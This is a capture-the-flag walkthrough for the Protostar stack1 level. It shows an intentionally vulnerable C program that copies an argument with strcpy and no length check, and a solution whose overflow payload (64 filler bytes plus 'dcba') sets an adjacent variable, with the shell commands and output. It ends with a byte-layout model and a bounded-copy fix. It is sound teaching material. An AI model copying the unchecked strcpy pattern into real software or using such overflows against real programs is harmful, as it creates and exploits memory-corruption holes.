Problem :lock:

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* declares errx() */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* no length check: an argument longer than 63 bytes writes past buffer */
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Hint :bulb:

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.

Protostar is little endian

Solution :key:

We already know that filling buffer[64] past its end overwrites modified. The source shows that this time modified has to end up as 0x61626364. Following the 1st hint, we look at man ascii and find this:

Oct   Dec   Hex   Char
──────────────────────
...
141   97    61    a
142   98    62    b
143   99    63    c
144   100   64    d
...

Now we know which chars have to overwrite modified. Per the 2nd hint, Protostar is little endian, so the least significant byte is stored at the lowest address: 0x61626364 sits in memory as dcba, not abcd, and we have to “invert” our payload. The final payload is 64 chars concatenated with dcba, and since the payload goes in argv[1], we do this:

user@protostar:/opt/protostar/bin$ python -c "print 'a'*64"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
user@protostar:/opt/protostar/bin$ ./stack1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
you have correctly got the variable to the right value
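
The same byte layout as an added example (not part of the original level or write-up): a constructed model of the frame that shows why the tail dcba reads back as 0x61626364, and how a copy bounded by the destination size leaves modified untouched. The names frame, read_modified, copy_and_read and demo are made up for this sketch, and placing modified directly after buffer is an assumption that matches what the solution above observes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64

/* Constructed model of the stack1 frame as one flat byte array, so the
   overflow is well-defined C: buffer at offset 0, modified right after
   it (the adjacency is an assumption matching the walkthrough). */
struct frame { unsigned char bytes[BUF_LEN + sizeof(uint32_t)]; };

/* Read modified as a little-endian CPU does: lowest address holds the
   least significant byte. */
static uint32_t read_modified(const struct frame *f) {
    const unsigned char *p = f->bytes + BUF_LEN;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Copy arg into the modelled frame and return the resulting modified.
   bounded == 0 mimics strcpy (length taken from the source; clamped
   only to keep the model inside its own array).
   bounded != 0 limits the copy to the destination buffer. */
uint32_t copy_and_read(const char *arg, int bounded) {
    struct frame f;
    size_t n = strlen(arg);
    size_t limit = bounded ? BUF_LEN - 1 : sizeof f.bytes;
    memset(&f, 0, sizeof f);            /* modified = 0 */
    memcpy(f.bytes, arg, n < limit ? n : limit);
    return read_modified(&f);
}

/* Build 64 filler bytes followed by tail, then run one of the copies. */
uint32_t demo(const char *tail, int bounded) {
    char arg[BUF_LEN + 16];
    memset(arg, 'a', BUF_LEN);
    snprintf(arg + BUF_LEN, sizeof arg - BUF_LEN, "%s", tail);
    return copy_and_read(arg, bounded);
}

int main(void) {
    printf("unbounded, tail dcba: 0x%08x\n", (unsigned)demo("dcba", 0));
    printf("unbounded, tail abcd: 0x%08x\n", (unsigned)demo("abcd", 0));
    printf("bounded,   tail dcba: 0x%08x\n", (unsigned)demo("dcba", 1));
    return 0;
}
```

In the real program the fix is the same idea: size the copy by the destination, for example snprintf(buffer, sizeof buffer, "%s", argv[1]), instead of strcpy.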

:checkered_flag: